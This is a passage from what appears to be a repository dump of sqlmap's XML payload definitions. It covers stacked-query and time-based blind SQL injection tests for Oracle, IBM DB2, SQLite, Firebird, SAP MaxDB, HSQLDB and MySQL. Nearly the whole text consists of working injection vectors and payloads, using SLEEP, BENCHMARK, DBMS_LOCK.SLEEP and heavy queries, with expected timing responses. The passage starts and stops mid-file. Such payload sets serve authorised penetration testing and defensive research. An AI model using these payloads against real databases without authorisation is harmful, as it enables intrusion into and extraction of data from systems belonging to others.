DUAL</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>\n        <request>\n            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>\n        <request>\n            <payload>;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>\n        <request>\n            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>\n        <request>\n            <payload>;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>Oracle</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>IBM DB2 stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>IBM DB2</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>\n        <request>\n            <payload>;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SQLite</dbms>\n            <dbms_version>&gt; 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>Firebird stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n    \n    <test>\n        <title>Firebird stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>Firebird</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>SAP MaxDB stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>\n        <request>\n            <payload>;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>SAP MaxDB</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>\n        <request>\n            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n    \n    <test>\n        <title>HSQLDB &gt;= 1.7.2 stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>\n        <request>\n            <payload>;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 1.7.2</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query - comment)</title>\n        <stype>4</stype>\n        <level>4</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>\n        <request>\n            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n            <comment>--</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>HSQLDB &gt;= 2.0 stacked queries (heavy query)</title>\n        <stype>4</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1-8</clause>\n        <where>1</where>\n        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>\n        <request>\n            <payload>;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>HSQLDB</dbms>\n            <dbms_version>&gt;= 2.0</dbms_version>\n        </details>\n    </test>\n    <!-- TODO: if possible, add payload for Microsoft Access -->\n    <!-- End of stacked queries tests -->\n</root>\n"
  },
  {
    "path": "sqlmap/data/xml/payloads/time_blind.xml",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\n<root>\n    <!-- Time-based boolean tests -->\n\n    <!-- Prefering \"query SLEEP\" over \"SLEEP\" because of JOIN-alike cases where SLEEPs get called multiple times (e.g. http://testphp.vulnweb.com/listproducts.php?cat=1) -->\n    <test>\n        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>\n        <stype>5</stype>\n        <level>1</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>AND SLEEP([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>OR SLEEP([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 AND time-based blind (SLEEP - comment)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>AND SLEEP([SLEEPTIME])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 OR time-based blind (SLEEP - comment)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>\n        <request>\n            <payload>OR SLEEP([SLEEPTIME])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>2</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>2</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK)</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 AND time-based blind (BENCHMARK - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt; 5.0.12 AND time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>2</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>\n        <request>\n            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &lt; 5.0.12 OR time-based blind (BENCHMARK - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&lt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt; 5.0.12 OR time-based blind (heavy query - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM])</vector>\n        <request>\n            <payload>OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C)</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[DELAYED]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt; 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind</title>\n        <stype>5</stype>\n        <level>2</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>\n        <request>\n            <payload>RLIKE SLEEP([SLEEPTIME])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>\n        <request>\n            <payload>RLIKE SLEEP([SLEEPTIME])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n     <test>\n        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n             <dbms_version>&gt;= 5.0.12</dbms_version>\n       </details>\n    </test>\n\n    <test>\n        <title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>\n        <stype>5</stype>\n        <level>4</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>\n        <request>\n            <payload>RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL AND time-based blind (ELT)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>1</risk>\n        <clause>1,2,3,8,9</clause>\n        <where>1</where>\n        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n            <dbms_version>&gt;= 5.0.12</dbms_version>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL OR time-based blind (ELT)</title>\n        <stype>5</stype>\n        <level>3</level>\n        <risk>3</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        </response>\n        <details>\n            <dbms>MySQL</dbms>\n        </details>\n    </test>\n\n    <test>\n        <title>MySQL AND time-based blind (ELT - comment)</title>\n        <stype>5</stype>\n        <level>5</level>\n        <risk>1</risk>\n        <clause>1,2,3,9</clause>\n        <where>1</where>\n        <vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>\n        <request>\n            <payload>AND ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>\n            <comment>#</comment>\n        </request>\n        <response>\n            <time>[SLEEPTIME]</time>\n        